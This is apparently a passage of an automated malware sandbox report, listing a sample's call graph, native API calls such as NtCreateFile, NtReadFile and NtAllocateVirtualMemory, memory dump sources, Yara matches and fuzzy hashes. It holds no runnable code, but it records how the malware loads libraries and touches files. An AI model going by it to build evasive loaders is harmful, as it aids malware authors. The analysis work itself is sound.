115480 41a26c 115479->115480 115484 1602ea0 LdrInitializeThunk 115480->115484 115481 41a28b 115481->115090 115483->115468 115484->115481 115486 40b1e0 115485->115486 115487 40b030 LdrLoadDll 115486->115487 115488 40b1f4 115487->115488 115488->115024 115490 40ae41 115489->115490 115491 40ae3d 115489->115491 115492 40ae5a 115490->115492 115493 40ae8c 115490->115493 115491->115027 115536 419cc0 LdrLoadDll 115492->115536 115494 40ae9d 115493->115494 115537 419cc0 LdrLoadDll 115493->115537 115494->115027 115497 40ae7c 115497->115027 115499 414394 115498->115499 115500 40f490 3 API calls 115499->115500 115501 4143b6 115500->115501 115501->115029 115503 408a79 115502->115503 115538 4087a0 115502->115538 115505 408a9d 115503->115505 115506 4087a0 20 API calls 115503->115506 115505->115031 115507 408a8a 115506->115507 115507->115505 115556 40f700 10 API calls 115507->115556 115510 41af50 LdrLoadDll 115509->115510 115511 41a50c 115510->115511 115680 1602e80 LdrInitializeThunk 115511->115680 115512 40c312 115514 40f490 115512->115514 115515 40f4ad 115514->115515 115681 419fb0 115515->115681 115517 40f4f5 115517->115035 115519 41a000 2 API calls 115520 40f51e 115519->115520 115520->115035 115522 41af50 LdrLoadDll 115521->115522 115523 41a01c 115522->115523 115687 1602d10 LdrInitializeThunk 115523->115687 115524 40c375 115524->115041 115524->115044 115527 41af50 LdrLoadDll 115526->115527 115528 41a06c 115527->115528 115688 1602d30 LdrInitializeThunk 115528->115688 115529 40c449 115529->115052 115532 41af50 LdrLoadDll 115531->115532 115533 419e2c 115532->115533 115689 1602fb0 LdrInitializeThunk 115533->115689 115534 40c49c 115534->115056 115536->115497 115537->115494 115539 407ea0 4 API calls 115538->115539 115554 4087ba 115539->115554 115540 408a49 115540->115503 115541 408a3f 115542 408160 2 API calls 115541->115542 115542->115540 115545 419ef0 2 API calls 115545->115554 115547 41a480 LdrLoadDll NtClose 115547->115554 115550 40c4b0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 115550->115554 115553 419e10 2 API calls 115553->115554 115554->115540 115554->115541 115554->115545 115554->115547 115554->115550 115554->115553 115557 419d00 115554->115557 115560 4085d0 115554->115560 115572 40f5e0 LdrLoadDll NtClose 115554->115572 115573 419d80 LdrLoadDll 115554->115573 115574 419db0 LdrLoadDll 115554->115574 115575 419e40 LdrLoadDll 115554->115575 115576 4083a0 115554->115576 115592 405f60 LdrLoadDll 115554->115592 115556->115505 115558 419d1c 115557->115558 115559 41af50 LdrLoadDll 115557->115559 115558->115554 115559->115558 115561 4085e6 115560->115561 115593 419870 115561->115593 115563 4085ff 115571 408771 115563->115571 115614 4081a0 115563->115614 115565 4086e5 115566 4083a0 11 API calls 115565->115566 115565->115571 115567 408713 115566->115567 115568 419ef0 2 API calls 115567->115568 115567->115571 115569 408748 115568->115569 115570 41a4f0 2 API calls 115569->115570 115569->115571 115570->115571 115571->115554 115572->115554 115573->115554 115574->115554 115575->115554 115577 4083c9 115576->115577 115659 408310 115577->115659 115580 41a4f0 2 API calls 115581 4083dc 115580->115581 115581->115580 115582 408467 115581->115582 115585 408462 115581->115585 115667 40f660 115581->115667 115582->115554 115583 41a480 2 API calls 115584 40849a 115583->115584 115584->115582 115586 419d00 LdrLoadDll 115584->115586 115585->115583 115587 4084ff 115586->115587 115587->115582 115671 419d40 115587->115671 115589 408563 115589->115582 115590 414a40 8 API calls 115589->115590 115591 4085b8 115590->115591 115591->115554 115592->115554 115594 41bf80 2 API calls 115593->115594 115595 419887 115594->115595 115621 409310 115595->115621 115597 4198a2 115598 4198e0 115597->115598 115599 4198c9 115597->115599 115601 41bd30 2 API calls 115598->115601 115600 41bdb0 2 API calls 115599->115600 115602 4198d6 115600->115602 115603 41991a 115601->115603 115602->115563 115604 41bd30 2 API calls 115603->115604 115605 419933 115604->115605 115611 419bd4 115605->115611 115627 41bd70 115605->115627 115608 419bc0 115609 41bdb0 2 API calls 115608->115609 115610 419bca 115609->115610 115610->115563 115612 41bdb0 2 API calls 115611->115612 115613 419c29 115612->115613 115613->115563 115615 40829f 115614->115615 115616 4081b5 115614->115616 115615->115565 115616->115615 115617 414a40 8 API calls 115616->115617 115618 408222 115617->115618 115619 41bdb0 2 API calls 115618->115619 115620 408249 115618->115620 115619->115620 115620->115565 115622 409335 115621->115622 115623 40ace0 LdrLoadDll 115622->115623 115624 409368 115623->115624 115626 40938d 115624->115626 115630 40cf10 115624->115630 115626->115597 115653 41a570 115627->115653 115631 40cf3c 115630->115631 115632 41a1d0 LdrLoadDll 115631->115632 115633 40cf55 115632->115633 115634 40cf5c 115633->115634 115641 41a210 115633->115641 115634->115626 115636 40cf7f 115636->115634 115650 41a800 LdrLoadDll 115636->115650 115638 40cf97 115639 41a480 2 API calls 115638->115639 115640 40cfba 115639->115640 115640->115626 115642 41a22c 115641->115642 115643 41af50 LdrLoadDll 115641->115643 115651 1602ca0 LdrInitializeThunk 115642->115651 115643->115642 115644 41a247 115644->115636 115645 41af50 LdrLoadDll 115644->115645 115646 41a26c 115645->115646 115652 1602ea0 LdrInitializeThunk 115646->115652 115647 41a28b 115647->115636 115650->115638 115651->115644 115652->115647 115654 41af50 LdrLoadDll 115653->115654 115655 41a58c 115654->115655 115658 1602f90 LdrInitializeThunk 115655->115658 115656 419bb9 115656->115608 115656->115611 115658->115656 115660 408328 115659->115660 115661 40ace0 LdrLoadDll 115660->115661 115662 408343 115661->115662 115663 414e40 LdrLoadDll 115662->115663 115664 408353 115663->115664 115665 40835c PostThreadMessageW 115664->115665 115666 408370 115664->115666 115665->115666 115666->115581 115668 40f673 115667->115668 115674 419e80 115668->115674 115672 41af50 LdrLoadDll 115671->115672 115673 419d5c 115672->115673 115673->115589 115675 41af50 LdrLoadDll 115674->115675 115676 419e9c 115675->115676 115679 1602dd0 LdrInitializeThunk 115676->115679 115677 40f69e 115677->115581 115679->115677 115680->115512 115682 41af50 LdrLoadDll 115681->115682 115683 419fcc 115682->115683 115686 1602f30 LdrInitializeThunk 115683->115686 115684 40f4ee 115684->115517 115684->115519 115686->115684 115687->115524 115688->115529 115689->115534

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A39D
                                                                                                                                                                  • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_xheuzyg.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$CreateRead
                                                                                                                                                                  • String ID: IA$!JA$bMA$bMA
                                                                                                                                                                  • API String ID: 3388366904-3023253649
                                                                                                                                                                  • Opcode ID: ef7624f14657ae611ed1c445d35104c046452ee4e5fc1cf42d46905f68572af3
                                                                                                                                                                  • Instruction ID: 1a44a0a510cf16399a68b9b0310e6076a598617947eea34bc7ac572c0acf3d52
                                                                                                                                                                  • Opcode Fuzzy Hash: ef7624f14657ae611ed1c445d35104c046452ee4e5fc1cf42d46905f68572af3
                                                                                                                                                                  • Instruction Fuzzy Hash: 9921F5B6204149AFCB08CF99DC80DEB77E9EF8C318B158209FA5DD3241C634E861CBA4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 10 41a3fa-41a3ff 12 41a401-41a449 call 41af50 NtReadFile 10->12 13 41a456-41a479 call 41af50 10->13
                                                                                                                                                                  APIs
                                                                                                                                                                  • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_xheuzyg.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileRead
                                                                                                                                                                  • String ID: !JA$bMA$bMA
                                                                                                                                                                  • API String ID: 2738559852-4222312340
                                                                                                                                                                  • Opcode ID: f5d69c3174e05bc86a178109d856cb3914d6d29a394158b171a444bda948698b
                                                                                                                                                                  • Instruction ID: 7b8c6c5140b2d318d394f7ddcf17d6bf2d253b3bb880768854d18de2509a359f
                                                                                                                                                                  • Opcode Fuzzy Hash: f5d69c3174e05bc86a178109d856cb3914d6d29a394158b171a444bda948698b
                                                                                                                                                                  • Instruction Fuzzy Hash: BB0140B2200104AFCB14DF99DC85EEB77ADEF8C724F058659FA2D97281C630E911CBA4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 19 41a400-41a416 20 41a41c-41a449 NtReadFile 19->20 21 41a417 call 41af50 19->21 21->20
                                                                                                                                                                  APIs
                                                                                                                                                                  • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_xheuzyg.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileRead
                                                                                                                                                                  • String ID: !JA$bMA$bMA
                                                                                                                                                                  • API String ID: 2738559852-4222312340
                                                                                                                                                                  • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                                  • Instruction ID: 27817754ac388b25b847a3362b671b2e44b934df7eae6808a762aa4d31f9cf83
                                                                                                                                                                  • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                                  • Instruction Fuzzy Hash: 93F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 235 40ace0-40ad09 call 41cc40 238 40ad0b-40ad0e 235->238 239 40ad0f-40ad1d call 41d060 235->239 242 40ad2d-40ad3e call 41b490 239->242 243 40ad1f-40ad2a call 41d2e0 239->243 248 40ad40-40ad54 LdrLoadDll 242->248 249 40ad57-40ad5a 242->249 243->242 248->249
                                                                                                                                                                  APIs
                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_xheuzyg.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Load
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                                  • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                                                                                                                                  • Instruction ID: d499f532a4605d4acc668fd39ab8700ce4e6b27de0f8ef54b1fb0fb48fae0bb4
                                                                                                                                                                  • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                                                                                                                                  • Instruction Fuzzy Hash: EF0152B5D4020DA7DB10EBA5DC42FDEB3789F14308F0041A5E908A7281F634EB54CB95
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 250 41a34b-41a3a1 call 41af50 NtCreateFile
                                                                                                                                                                  APIs
                                                                                                                                                                  • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A39D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_xheuzyg.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                  • Opcode ID: 12cfcb5ea174877c90f8108286c61aa96043635341142e2dafce63182e3f7af1
                                                                                                                                                                  • Instruction ID: 97d521f3626620c096edecc184fb90f6272adae795417988079d4a02fc26e4a1
                                                                                                                                                                  • Opcode Fuzzy Hash: 12cfcb5ea174877c90f8108286c61aa96043635341142e2dafce63182e3f7af1
                                                                                                                                                                  • Instruction Fuzzy Hash: D401BDB2201208AFCB08CF88DC84EEB77A9BF8C754F158258FA1DD7241C630E851CBA4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 254 41a350-41a366 255 41a36c-41a3a1 NtCreateFile 254->255 256 41a367 call 41af50 254->256 256->255
                                                                                                                                                                  APIs
                                                                                                                                                                  • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A39D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_xheuzyg.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                  • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                                  • Instruction ID: 880687b14e2bfdcefdfb108c829fe1d34a34742feba638e3287dae326a4d6923
                                                                                                                                                                  • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                                  • Instruction Fuzzy Hash: AAF0BDB2201208AFCB08CF89DC85EEB77ADAF8C754F158248BA1D97241C630E8518BA4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 258 41a52a-41a56d call 41af50 NtAllocateVirtualMemory
                                                                                                                                                                  APIs
                                                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B124,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A569
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_xheuzyg.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2167126740-0
                                                                                                                                                                  • Opcode ID: c3a23ac7127e698266cb2f4e173484c54ba19efb84b06eed4f5965f467362df6
                                                                                                                                                                  • Instruction ID: dd1da3696fa03a6d26d92ec62aa55cd00a5fa1e1564089ef81c715d3fca0ead0
                                                                                                                                                                  • Opcode Fuzzy Hash: c3a23ac7127e698266cb2f4e173484c54ba19efb84b06eed4f5965f467362df6
                                                                                                                                                                  • Instruction Fuzzy Hash: 6BF08CB1200108AFDB14EF89CC81EEB77ADAF88354F158649FE4C97242C230E820CBA0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 261 41a530-41a546 262 41a54c-41a56d NtAllocateVirtualMemory 261->262 263 41a547 call 41af50 261->263 263->262
                                                                                                                                                                  APIs
                                                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B124,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A569
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_xheuzyg.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2167126740-0
                                                                                                                                                                  • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                                  • Instruction ID: 4e0f78fd3c2c10b6dba7ecb12144fed22081eaa1fb7babd41561f41a61d0d9a2
                                                                                                                                                                  • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                                  • Instruction Fuzzy Hash: A3F015B2200208AFCB14DF89CC81EEB77ADAF88754F118149BE1C97241C630F811CBA4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_xheuzyg.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                                  • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                                  • Instruction ID: 58703de6d0d09b45194c1a78dafb6a6614d70e6a8447524affba2eb7b0ba4c9c
                                                                                                                                                                  • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                                  • Instruction Fuzzy Hash: E9D01776200214ABD710EB99CC85EE77BACEF48764F154499BA1C9B242C530FA1086E4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_xheuzyg.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                                  • Opcode ID: 270d311a7600dcd56849dc1e0cd5c82fe772fe242933ef6b8e54a407a65ea76c
                                                                                                                                                                  • Instruction ID: 53df6d64d5a5c75025c56b926d511475e16801676c3c5ace426f8197d8ce34cc
                                                                                                                                                                  • Opcode Fuzzy Hash: 270d311a7600dcd56849dc1e0cd5c82fe772fe242933ef6b8e54a407a65ea76c
                                                                                                                                                                  • Instruction Fuzzy Hash: 80D05EA940A2C04FCB11EAB465D10D67B80EE512287245E8EE4AC47607D168D21A9295
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                  • Opcode ID: 958cddbf3d6e232a9c81c8180100464fcb18244e2ef11a7e3c65bc96c14f0862
                                                                                                                                                                  • Instruction ID: cc6772eee3023c37651a253ab303df0c86434677886ffd2426b4bd24435d2d6f
                                                                                                                                                                  • Opcode Fuzzy Hash: 958cddbf3d6e232a9c81c8180100464fcb18244e2ef11a7e3c65bc96c14f0862
                                                                                                                                                                  • Instruction Fuzzy Hash: 5990026224240003410575584814617500E97E1201B59C021E5014690EC62589916225
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                  • Opcode ID: 7001255cb872f985a69a667dd7899c8ba86ff0b4e0c0b6b7901eafe6f7776dc5
                                                                                                                                                                  • Instruction ID: 39f8fd8eb0efb983ac405cc96e45d8d5006029c378a79eed280911006b83abc9
                                                                                                                                                                  • Opcode Fuzzy Hash: 7001255cb872f985a69a667dd7899c8ba86ff0b4e0c0b6b7901eafe6f7776dc5
                                                                                                                                                                  • Instruction Fuzzy Hash: DA90023224140803D1807558480464B100997D2301F99C015A4025754ECB158B5977A1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                  • Opcode ID: 98cb23ae960a0a2c87b11e46f5b63d8e349783e18ba86330c019101571d52258
                                                                                                                                                                  • Instruction ID: 170f5f321bffd927bff6be1d05a890295c4c69ffd8b958f6c64e93a1eb1a69e8
                                                                                                                                                                  • Opcode Fuzzy Hash: 98cb23ae960a0a2c87b11e46f5b63d8e349783e18ba86330c019101571d52258
                                                                                                                                                                  • Instruction Fuzzy Hash: 7A900226251400030105B9580B04507104A97D6351359C021F5015650DD72189615221
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                  • Opcode ID: 66ca47f5f369f8408d92d60a38f2cd188df4ff3c8d558ec120a0dc1928c2161b
                                                                                                                                                                  • Instruction ID: 86355e84d4ab19dbf5598ce07d49d66b8cfd40521236cdd1402fe483bfe67d2b
                                                                                                                                                                  • Opcode Fuzzy Hash: 66ca47f5f369f8408d92d60a38f2cd188df4ff3c8d558ec120a0dc1928c2161b
                                                                                                                                                                  • Instruction Fuzzy Hash: B990022234140003D140755858186075009E7E2301F59D011E4414654DDA1589565322
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                  • Opcode ID: d6a1fd7eaf1fcf1f30453e26ecc5f235124ab5ab21784645f0851cee41d1969a
                                                                                                                                                                  • Instruction ID: 0425915a1679dd19d10d01ecb2a2e38c49344ca2a805fe3e49f79e16317e102f
                                                                                                                                                                  • Opcode Fuzzy Hash: d6a1fd7eaf1fcf1f30453e26ecc5f235124ab5ab21784645f0851cee41d1969a
                                                                                                                                                                  • Instruction Fuzzy Hash: E490022A25340003D1807558580860B100997D2202F99D415A4015658DCA1589695321
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                  • Opcode ID: 22f7c06e89acafdd6c7c62605d1441d1b6341de81ad03b5d676d7919b765093d
                                                                                                                                                                  • Instruction ID: 0c854555e284bd947f17eb26876b6b384b559a178313efbb4526e97084c21e14
                                                                                                                                                                  • Opcode Fuzzy Hash: 22f7c06e89acafdd6c7c62605d1441d1b6341de81ad03b5d676d7919b765093d
                                                                                                                                                                  • Instruction Fuzzy Hash: 3790023224140413D11175584904707100D97D1241F99C412A4424658ED7568A52A221
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                  • Opcode ID: becd7720002113ce1cfdc753768c9b30a688a519a03f60043aabe287ce96b267
                                                                                                                                                                  • Instruction ID: 353cff818ffbccba50bfc541d0719187fd0b03b7a40c99d0ff4b973762542089
                                                                                                                                                                  • Opcode Fuzzy Hash: becd7720002113ce1cfdc753768c9b30a688a519a03f60043aabe287ce96b267
                                                                                                                                                                  • Instruction Fuzzy Hash: 8E900222282441535545B5584804507500AA7E1241799C012A5414A50DC6269956D721
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
